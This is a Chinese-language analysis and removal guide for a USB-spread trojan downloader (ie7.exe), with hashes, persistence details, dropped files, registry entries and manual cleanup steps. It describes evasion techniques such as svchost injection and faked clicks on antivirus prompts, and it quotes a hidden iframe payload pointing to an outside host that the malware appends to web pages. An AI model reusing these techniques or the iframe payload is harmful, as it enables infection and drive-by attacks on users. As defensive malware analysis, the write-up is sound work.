这是一个通过U盘传播的木马下载器

File: ie7.exe
Size: 37376 bytes
MD5: FA931258C1FEFA770EB91A5EB6CA894D
SHA1: 72EC4D4A8E9D15C1DEAF6FCE6F2C8867C6A38F41
CRC32: 04DC6B68
编写语言：Delphi

病毒运行后
生成如下文件
C:\WINDOWS\system32\ie7.exe
同时注册为服务：ie7 ，达到开机启动的目的
服务描述：为即插即用设备提供支持
显示名称：Telepho
启动类型：自动

启动一个svchost.exe 将自身注入到svchost.exe的进程空间中（方便下载木马，因为svchost.exe一般就是需要联网的，通过他联网，防火墙不会有任何反映）

试图向瑞星的卡卡上网助手的IE防漏墙发送模拟按键“允许”的命令
试图向IE执行保护的窗口发送模拟按键“允许执行”的命令

ping 127.0.0.0 15次
修改系统时间为 1981年1月12日

在每个分区下生成一个autorun.inf和ie7.exe

下载木马:http://ads.xxxxxxx.com/100.exe~119.exe到%system32%下面

下载的木马种类和上回分析的pegefile.pif几乎一样
木马植入完毕后 生成如下一些文件（包括但不限于）
C:\Program Files\Internet Explorer\PLUGINS\SysWin64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys（盗号木马，并在E盘下生成Autorun.exe）
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Tao
C:\WINDOWS\system32\drivers\usbinte.sys
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\ejcepm.dll
C:\WINDOWS\system32\ezdngw.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\kwuppx.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\winow.dll
C:\WINDOWS\winow.exe
C:\WINDOWS\system32\NVDispDrv.dll
C:\WINDOWS\system32\pfmlqz.dll
C:\WINDOWS\system32\skguud.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\visin.exe
C:\WINDOWS\system32\xzqsmg.dll
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\NVDispDrv.exe
C:\WINDOWS\RichDll.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\system32\nslkupi.exe（具备arp欺骗功能）
C:\WINDOWS\uninstall\rundl132.exe（威金，感染可执行文件）
C:\WINDOWS\system32\ntsokele.exe（感染htm asp html等文件，在其后面加入<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>的代码）
...
对应sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <upxdnd><C:\WINDOWS\upxdnd.exe>    []
      <AVPSrv><C:\WINDOWS\AVPSrv.exe>    []
      <cmdbcs><C:\WINDOWS\cmdbcs.exe>    []
      <NVDispDrv><C:\WINDOWS\NVDispDrv.exe>    []
      <Kvsc3><C:\WINDOWS\Kvsc3.exe>    []
      <load><C:\WINDOWS\uninstall\rundl132.exe>    []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
      <MSDEG32><LYLoader.exe>    []
      <MSDWG32><LYLoadbr.exe>    [N/A]
      <MSDCG32      ><LYLeador.exe>    [N/A]
      <MSDOG32><LYLoador.exe>    [N/A]
      <MSDSG32><LYLoadar.exe>    [N/A]
      <MSDMG32><LYLoadmr.exe>    [N/A]
      <MSDHG32><LYLoadhr.exe>    [N/A]
      <MSDQG32><LYLoadqr.exe>    [N/A]
      <visin><C:\WINDOWS\system32\visin.exe>    [Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
      <{5D83AD9C-3BFC-43F5-979D-2904DBC54A8E}><C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys>    []
服务：
[Telepho / ie7][Stopped/Auto Start]
    <C:\WINDOWS\system32\ie7.exe><N/A>
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
    <C:\WINDOWS\system32\ntsokele.exe><N/A>

清除办法：
重启计算机进入
安全模式下(开机后不断 按F8键    然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng （http://download.kztechs.com/files/sreng2.zip）
启动项目    注册表 删除如下项目
<TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <upxdnd><C:\WINDOWS\upxdnd.exe>    []
      <AVPSrv><C:\WINDOWS\AVPSrv.exe>    []
      <cmdbcs><C:\WINDOWS\cmdbcs.exe>    []
      <NVDispDrv><C:\WINDOWS\NVDispDrv.exe>    []
      <Kvsc3><C:\WINDOWS\Kvsc3.exe>    []
      <load><C:\WINDOWS\uninstall\rundl132.exe>    []
<MSDEG32><LYLoader.exe>    []
      <MSDWG32><LYLoadbr.exe>    [N/A]
      <MSDCG32      ><LYLeador.exe>    [N/A]
      <MSDOG32><LYLoador.exe>    [N/A]
      <MSDSG32><LYLoadar.exe>    [N/A]
      <MSDMG32><LYLoadmr.exe>    [N/A]
      <MSDHG32><LYLoadhr.exe>    [N/A]
      <MSDQG32><LYLoadqr.exe>    [N/A]
      <visin><C:\WINDOWS\system32\visin.exe>    [Microsoft Corporation]

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：
Telepho / ie7
Remote Help Session Manager / Rasautol

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击    菜单栏下方的 文件夹按钮（搜索右边的按钮）
从左边的资源管理器 进入C盘
删除如下文件C:\Program Files\Internet Explorer\PLUGINS\SysWin64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Sys
C:\Program Files\Internet Explorer\PLUGINS\WinSys64.Tao
C:\WINDOWS\system32\drivers\usbinte.sys
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\ejcepm.dll
C:\WINDOWS\system32\ezdngw.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\kwuppx.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\winow.dll
C:\WINDOWS\winow.exe
C:\WINDOWS\system32\NVDispDrv.dll
C:\WINDOWS\system32\pfmlqz.dll
C:\WINDOWS\system32\skguud.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\visin.exe
C:\WINDOWS\system32\xzqsmg.dll
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\NVDispDrv.exe
C:\WINDOWS\RichDll.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\system32\nslkupi.exe
C:\WINDOWS\uninstall\rundl132.exe
C:\WINDOWS\system32\ntsokele.exe
C:\ie7.exe
C:\autorun.inf
从左边的资源管理器 进入其他盘
删除ie7.exe autorun.inf 删除E盘下的autorun.exe
如果装有QQ请把QQ 安装文件夹中的Timplatform.exe删除 把Timplatfrom.exe重命名为Timplatform.exe